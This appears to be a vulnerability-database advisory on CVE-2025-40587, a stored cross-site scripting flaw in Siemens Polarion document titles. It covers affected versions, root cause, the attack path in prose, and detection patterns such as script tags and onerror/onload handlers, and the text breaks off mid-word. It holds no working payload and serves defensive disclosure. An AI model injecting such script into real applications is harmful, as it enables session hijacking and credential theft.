Vulnerability Database / CVE-2025-40587 CVE-2025-40587: Polarion Stored XSS Vulnerability CVE-2025-40587 is a stored XSS vulnerability in Polarion V2404 and V2410 that allows authenticated attackers to inject malicious JavaScript into document titles. This article covers technical details, affected versions, and mitigations. Published : February 13, 2026 CVE-2025-40587 Overview A stored cross-site scripting (XSS) vulnerability has been identified in Siemens Polarion application lifecycle management software. The affected application allows arbitrary JavaScript code to be included in document titles. This could allow an authenticated remote attacker to conduct a stored cross-site scripting attack by creating specially crafted document titles that are later viewed by other users of the application. Critical Impact Authenticated attackers can inject malicious JavaScript into document titles, which executes in the browsers of other users viewing those documents. This can lead to session hijacking, credential theft, and unauthorized actions performed on behalf of victims. Affected Products Polarion V2404 (All versions prior to V2404.5) Polarion V2410 (All versions prior to V2410.2) Discovery Timeline 2026-02-10 - CVE CVE-2025-40587 published to NVD 2026-02-10 - Last updated in NVD database Technical Details for CVE-2025-40587 Vulnerability Analysis This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as cross-site scripting. The flaw exists in the document title handling mechanism within Siemens Polarion, where user-supplied input is not properly sanitized before being rendered in the application interface. In a stored XSS scenario like this one, the malicious payload persists in the application's database. When other authenticated users navigate to pages displaying the crafted document title, the injected JavaScript executes within their browser context. This attack requires the attacker to have valid authentication credentials to create or modify document titles, but the impact extends to any user who subsequently views the poisoned content. The network-based attack vector with low complexity makes this vulnerability accessible to any authenticated user with document creation or editing privileges. The downstream impact is significant as injected scripts execute with the full privileges of the victim's authenticated session. Root Cause The root cause is improper input validation and output encoding in the document title handling functionality. When document titles are stored and later rendered in the web interface, the application fails to properly sanitize or encode special characters that can be interpreted as HTML or JavaScript. This allows attackers to inject script tags or event handlers that execute when the title is displayed to other users. Attack Vector The attack is executed over the network by an authenticated user. The attacker creates a new document or modifies an existing document title to include malicious JavaScript code. The crafted title is stored in the Polarion database. When other users browse document listings, search results, or any view that displays the malicious document title, the injected script executes in their browser. Typical attack payloads might include scripts designed to steal session cookies, redirect users to phishing pages, perform actions on behalf of the victim, or exfiltrate sensitive data from the application interface. Since this is stored XSS, the attack persists until the malicious document title is cleaned or removed, potentially affecting numerous users over time. Detection Methods for CVE-2025-40587 Indicators of Compromise Document titles containing HTML tags, JavaScript event handlers (e.g., onerror , onload , onclick ), or <script> elements Unusual browser behavior or unexpected redirects when viewing document listings in Polarion Audit log entries showing document title modifications with suspicious encoded characters or script-like content Reports from users about unexpected popups, prompts, or authentication requests while using Polarion Detection Strategies Implement web application firewall (WAF) rules to detect XSS patterns in HTTP requests targeting document creation and modification endpoints Enable detailed audit logging for all document title creation and modification events Deploy browser-based XSS detection mechanisms through Content Security Policy (CSP) violation reporting Perform regular database scans to identify document titles containing script tags or JavaScript event handlers Monitoring Recommendations Monitor Polarion application logs for unusual patterns in document title content, particularly encoded HTML entities or script-related keywords Configure SIEM alerting for multiple rapid document title changes from a single user account Review CSP violation reports for blocked inline script execution attempts Conduct periodic security assessments to identify stored XSS paylo